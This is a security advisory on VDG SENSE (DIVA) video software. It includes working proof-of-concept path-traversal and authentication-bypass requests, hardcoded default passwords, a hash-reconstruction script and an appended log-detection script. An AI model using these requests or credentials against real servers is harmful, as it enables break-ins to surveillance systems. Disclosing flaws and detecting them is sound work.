SEC Consult Vulnerability Lab Security Advisory < 20141218-0 >
=======================================================================
              title: Multiple critical vulnerabilities
            product: VDG Security SENSE (formerly DIVA)
 vulnerable version: 2.3.13
      fixed version: unknown - no vendor confirmation
             impact: critical
           homepage: https://vdgsecurity.com/
              found: 2014-10-01
                 by: Stefan Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"VDG Sense is our video management system (VMS). VDG Sense gives you control
of all live images and stored video data, in a user-friendly interface. Our
solution is based on an open platform, tailored to your specific needs and
requirements and ready to be integrated in any security solution."

Source: https://vdgsecurity.com/sense/

"DIVA is our former trademark, which we used to brand our video management
software and other VDG products. With the launch of our new trademark, VDG
Sense, we have rebranded the software to VDG Sense and promote it as such
from September 15, 2014. Other products, such as our servers, are available
under the label VDG."

Source: https://vdgsecurity.com/diva/

Business recommendation:
------------------------
Attackers are able to completely compromise the VDG SENSE server, as they can
gain access at the operating system level. The SENSE server can then be used
as an entry point into the target infrastructure (lateral movement, privilege
escalation).

SEC Consult highly recommends not to use this software until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.

Although the vendor no longer responds to our mails, some vulnerabilities
seem to be fixed in the most recent version of SENSE (2.3.15). It is assumed
that further critical vulnerabilities exist.
Vulnerability overview/description:
-----------------------------------
1) Unauthenticated local file disclosure
Unauthenticated users can read arbitrary files from the filesystem with the
privileges of the "SYSTEM" operating system user. These files include
configuration files containing sensitive information such as clear text
passwords and password hashes, which can be used in further attacks.

2) Authentication bypass / Clear text password disclosure
Some parts of the DIVA application are vulnerable to authentication bypass.
This allows attackers to update the DIVA plugin configuration. Furthermore,
DIVA plugin configurations can be read. This configuration includes clear
text DIVA administrator credentials, as DIVA plugins require access to such
an account for operation.

3) Insecure service configuration / Hardcoded default credentials - Postgres
The PostgreSQL database is offered via the network (TCP port 5432) and can be
accessed remotely using hardcoded credentials which can't be changed.

4) Hardcoded default credentials - Windows Users
Several local Windows users are created in the course of the DIVA setup.
These are used to run some of the DIVA services. These users can be used to
log on to the server running DIVA.

5) Critical information disclosure / User database leakage
After authentication with the DIVA (fat) client via the proprietary protocol
(TCP port 51410), the server returns the contents of the user database to the
client. This works regardless of whether the user has administrator rights or
not. The user database (users.ini) contains all users and their password
hashes. This information is sufficient to log in as another user; an attacker
does not require knowledge of the plain text passwords.

6) Use of plain text protocols
All DIVA communication transport channels (e.g. via TCP ports 80 and 51410)
lack encryption.
7) Buffer overflow vulnerabilities
The DIVA web service API (/webservice) is vulnerable to a stack based buffer
overflow when processing "AuthenticateUser" requests. Both the "user" and the
"password" parameter are vulnerable. None of the DIVA modules are
ASLR-enabled. An exploit that uses ROP to bypass DEP has been implemented.

Proof of concept:
-----------------
1) Unauthenticated local file disclosure
Arbitrary files can be downloaded because of vulnerabilities in the
proprietary web server implementation. An example for x64 hosts:

http:///images/../../../../Windows/SysWOW64/config/systemprofile/AppData/Roaming/Diva/Settings/users.ini

Interesting DIVA-specific files:
config/systemprofile/AppData/Roaming/Diva/Settings/users.ini
  (DIVA user database)
config/systemprofile/AppData/Roaming/Diva/DivaManager/DivaManager.ini
  (contains DIVA "master user")
config/systemprofile/AppData/Roaming/Diva/DivaManager/Plugins/
  (DIVA plugin configurations)
[...]

2) Authentication bypass / Clear text password disclosure
Authentication for parts of the application can be bypassed by sending the
HTTP Authorization header containing a colon ":".

GET /plugins/divacal/getsettings?sessionkey= HTTP/1.1
Host:
Authorization: Basic Og==

The response contains the plugin configuration for "divacal":

HTTP/1.1 200 OK
Date: Thu, 23 Okt 2014 10:46:28 GMT
Server: Diva HTTP Plugin 2.0
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Type: application/xml; charset=UTF-8
Content-Length: 1179

DivaCal settings
0 DIVA Connection yes yes
[...]
1 DIVAUsername string Administrator Administrator
  The username used to login to to the DIVA management server.
2 DIVAPassword password !DVadmin !DVadmin
  The password required to login to the DIVA management server.
Other activated plugins can be queried via the following request:

GET /plugins/?sessionkey= HTTP/1.1
Host:
Authorization: Basic Og==

Plugin settings can be updated as follows:

POST /plugins/http/updatesettings?sessionkey= HTTP/1.1
Host:
Authorization: Basic Og==
Content-Length: 29

groupid=0&DocumentRoot=htdocs

3) Insecure service configuration / Hardcoded default credentials - Postgres
The Postgres root user is as follows:
Username: root
Password: ArpaRomaWi

4) Hardcoded default credentials - Windows Users
The created Windows users are as follows:
Username: postgres
Password: !DVService

Username: NTP
Password: !DVService

5) Critical information disclosure / User database leakage
Below is an excerpt from the DIVA protocol communication (TCP port 51410):

00000000  48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  H....... ........   <- SERVER
00000010  00 00 00 00 0d 00 00 20 01 00 02 20 03 00 00 20  ....... ... ...
00000020  06 00 11 00 32 2e 33 2e 31 33 00 00 02 00 00 20  ....2.3. 13.....
00000030  01 00 02 40 04 00 00 00 04 00 00 20 06 00 11 00  ...@.... ... ....
00000040  44 69 76 61 20 73 65 72 76 65 72 00              Diva ser ver.

00000000  b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ........ ........   <- CLIENT
00000010  00 00 00 00 29 00 00 20 c9 00 02 40 05 00 00 20  ....).. ...@...      Note: client sends passwordHash and digestHash
00000020  f6 01 01 40 61 64 6d 69 6e 69 73 74 72 61 74 6f  ...@admi nistrato
00000030  72 00 00 00 09 00 00 20 f7 01 01 40 49 41 68 6b  r...... ...@IAhk
00000040  43 72 33 61 68 7a 59 39 67 53 57 73 56 37 33 6b  Cr3ahzY9 gSWsV73k
00000050  41 42 32 64 51 79 38 3d 00 00 00 00 0a 00 00 20  AB2dQy8= .......
00000060  fa 01 01 40 35 34 38 31 35 36 32 31 38 64 33 65  ...@5481 56218d3e
00000070  31 63 35 35 66 63 30 30 35 65 38 32 61 32 32 30  1c55fc00 5e82a220
00000080  61 34 63 30 00 00 00 00 02 00 00 20 05 00 11 40  a4c0.... ... ...@
00000090  02 00 00 00 03 00 00 20 0b 00 11 40 00 00 00 00  ....... ...@....
000000A0  00 00 00 00 02 00 00 20 0f 00 11 40 00 00 00 00  ....... ...@....
000000B0  02 00 00 20 02 00 11 40 00 00 00 00              ... ...@ ....

0000004C  30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  0....... ........   <- SERVER
0000005C  00 00 00 00 07 00 00 20 ca 00 02 40 02 00 00 20  ....... ...@...
0000006C  f5 01 01 40 01 00 00 00 02 00 00 20 02 00 11 40  ...@.... ... ...@
0000007C  01 00 00 00                                      ....

000000BC  50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  P....... ........   <- CLIENT
000000CC  00 00 00 00 0f 00 00 20 01 00 1c 40 0b 00 00 20  ....... ...@...
000000DC  02 00 1c 40 47 45 54 20 2f 75 73 65 72 6d 61 6e  ...@GET /userman
000000EC  61 67 65 6d 65 6e 74 2f 6f 73 64 73 74 79 6c 65  agement/ osdstyle
000000FC  73 20 44 49 56 41 2f 31 2e 30 00 00 01 00 00 20  s DIVA/1 .0.....
0000010C  03 00 1c 40                                      ...@

00000080  24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  $....... ........   <- SERVER
00000090  00 00 00 00 04 00 00 20 07 01 11 40 02 00 00 20  ....... ...@...
000000A0  06 00 11 00 00 00 00 00 24 00 00 00 00 00 00 00  ........ $.......
[...]
00000200  9c 02 01 40 02 00 00 20 06 00 11 00 0d 0a 00 00  ...@... ........
00000210  bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ........ ........
00000220  00 00 00 00 2a 00 00 20 f4 01 01 40 28 00 00 20  ....*.. ...@(..
00000230  06 00 11 00 5b 61 64 6d 69 6e 69 73 74 72 61 74  ....[adm inistrat   -----
00000240  6f 72 5d 0d 0a 61 64 6d 69 6e 72 69 67 68 74 73  or]..adm inrights   |
00000250  3d 31 0d 0a 61 6e 64 72 6f 69 64 3d 0d 0a 64 69  =1..andr oid=..di   |
00000260  67 65 73 74 48 61 73 68 3d 35 34 38 31 35 36 32  gestHash =5481562   |
00000270  31 38 64 33 65 31 63 35 35 66 63 30 30 35 65 38  18d3e1c5 5fc005e8   |
00000280  32 61 32 32 30 61 34 63 30 0d 0a 65 6d 61 69 6c  2a220a4c 0..email   | <- DIVA user database
00000290  3d 0d 0a 66 75 6c 6c 6e 61 6d 65 3d 0d 0a 69 6f  =..fulln ame=..io   |
000002A0  73 3d 0d 0a 70 61 73 73 77 6f 72 64 3d 49 41 68  s=..pass word=IAh   |
000002B0  6b 43 72 33 61 68 7a 59 39 67 53 57 73 56 37 33  kCr3ahzY 9gSWsV73   |
000002C0  6b 41 42 32 64 51 79 38 3d 0d 0a 0d 0a 00 00 00  kAB2dQy8 =.......   |
                                                                                -----
000002D0  24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  $....... ........

For the sake of completeness the password hashing scheme has been reverse
engineered. As both hashes can be used for authentication directly, brute
force attacks against the password hashes are not required.

#!/usr/bin/env python3
import hashlib
from base64 import b64encode

user = 'administrator'
password = '!DVadmin'

# digestHash: MD5 over "user:DIVA:password", hex-encoded and upper-cased
digestHash = hashlib.md5((user + ":DIVA:" + password).encode()).hexdigest().upper()

# passwordHash: base64 of SHA-1(SHA-1(password))
passwordHash = b64encode(hashlib.sha1(hashlib.sha1(password.encode()).digest()).digest()).decode()

print('digestHash', digestHash)
print('passwordHash', passwordHash)

6) Use of plain text protocols
No proof of concept necessary.

7) Buffer overflow vulnerabilities
Detailed proof of concept exploits have been removed for this vulnerability.

Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in 2.3.13, which was the most
recent version at the time of discovery.

Vendor contact timeline:
------------------------
2014-10-24: Sending responsible disclosure policy and requesting encryption keys.
2014-10-28: Vendor responds, provides encryption keys.
2014-10-29: Sending advisory and proof of concept exploit via encrypted channel.
2014-10-29: Vendor confirms receipt of advisory.
2014-11-10: Requesting status update.
2014-11-17: Vendor states that team is "very well on track to solve the issues".
2014-11-18: Clarifying criticality of vulnerabilities and viability of attack,
            even in closed networks; referring to Shodan search results.
2014-12-10: Requesting status update. No reply.
2014-12-18: SEC Consult releases security advisory.

Solution:
---------
It seems some of the vulnerabilities are fixed in the most recent version of
SENSE (2.3.15). The vendor stopped responding to our emails, so we don't know
which vulnerabilities were actually fixed.

Workaround:
-----------
No workaround available.
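With no vendor workaround, detecting attempts against issues 1 and 2 is what remains on the defender's side. The following added example (not part of the SEC Consult advisory) checks web request records for the two request patterns described above: a path traversal sequence in the request path and a Basic credential that decodes to a bare colon; the sample requests are constructed for illustration.

```python
#!/usr/bin/env python3
"""Flag HTTP requests matching the SENSE/DIVA request patterns from issues 1 and 2.

Constructed example, not part of the advisory. Each request record is a dict with
the request path and the Authorization header value.
"""
import base64
import binascii
from urllib.parse import unquote


def traversal_in_path(path: str) -> bool:
    """True if any path segment is '..' after URL-decoding (also covers %2e%2e)."""
    decoded = unquote(unquote(path.split('?', 1)[0]))
    return any(seg == '..' for seg in decoded.replace('\\', '/').split('/'))


def empty_basic_credentials(auth_header: str) -> bool:
    """True for 'Basic <b64>' where <b64> decodes to ':' (empty user and password)."""
    scheme, _, token = auth_header.strip().partition(' ')
    if scheme.lower() != 'basic':
        return False
    try:
        cred = base64.b64decode(token.strip(), validate=True).decode('utf-8', 'replace')
    except (binascii.Error, ValueError):
        return False
    user, sep, pwd = cred.partition(':')
    return sep == ':' and user == '' and pwd == ''


def classify(request: dict) -> list:
    """Return the list of matched patterns for one request record."""
    findings = []
    if traversal_in_path(request.get('path', '')):
        findings.append('path-traversal')
    if empty_basic_credentials(request.get('authorization', '')):
        findings.append('empty-basic-auth')
    return findings


# Constructed sample records modelled on the advisory's proof-of-concept requests.
SAMPLE_REQUESTS = [
    {'path': '/images/../../../../Windows/SysWOW64/config/systemprofile/AppData/Roaming/Diva/Settings/users.ini',
     'authorization': ''},
    {'path': '/plugins/divacal/getsettings?sessionkey=', 'authorization': 'Basic Og=='},
    {'path': '/images/logo.png', 'authorization': 'Basic YWRtaW46c2VjcmV0'},  # admin:secret, benign
]

if __name__ == '__main__':
    for r in SAMPLE_REQUESTS:
        print(r['path'], classify(r))
```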
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail:    research at sec-consult dot com
Web:     https://www.sec-consult.com
Blog:    http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com

EOF Stefan Viehböck / @2014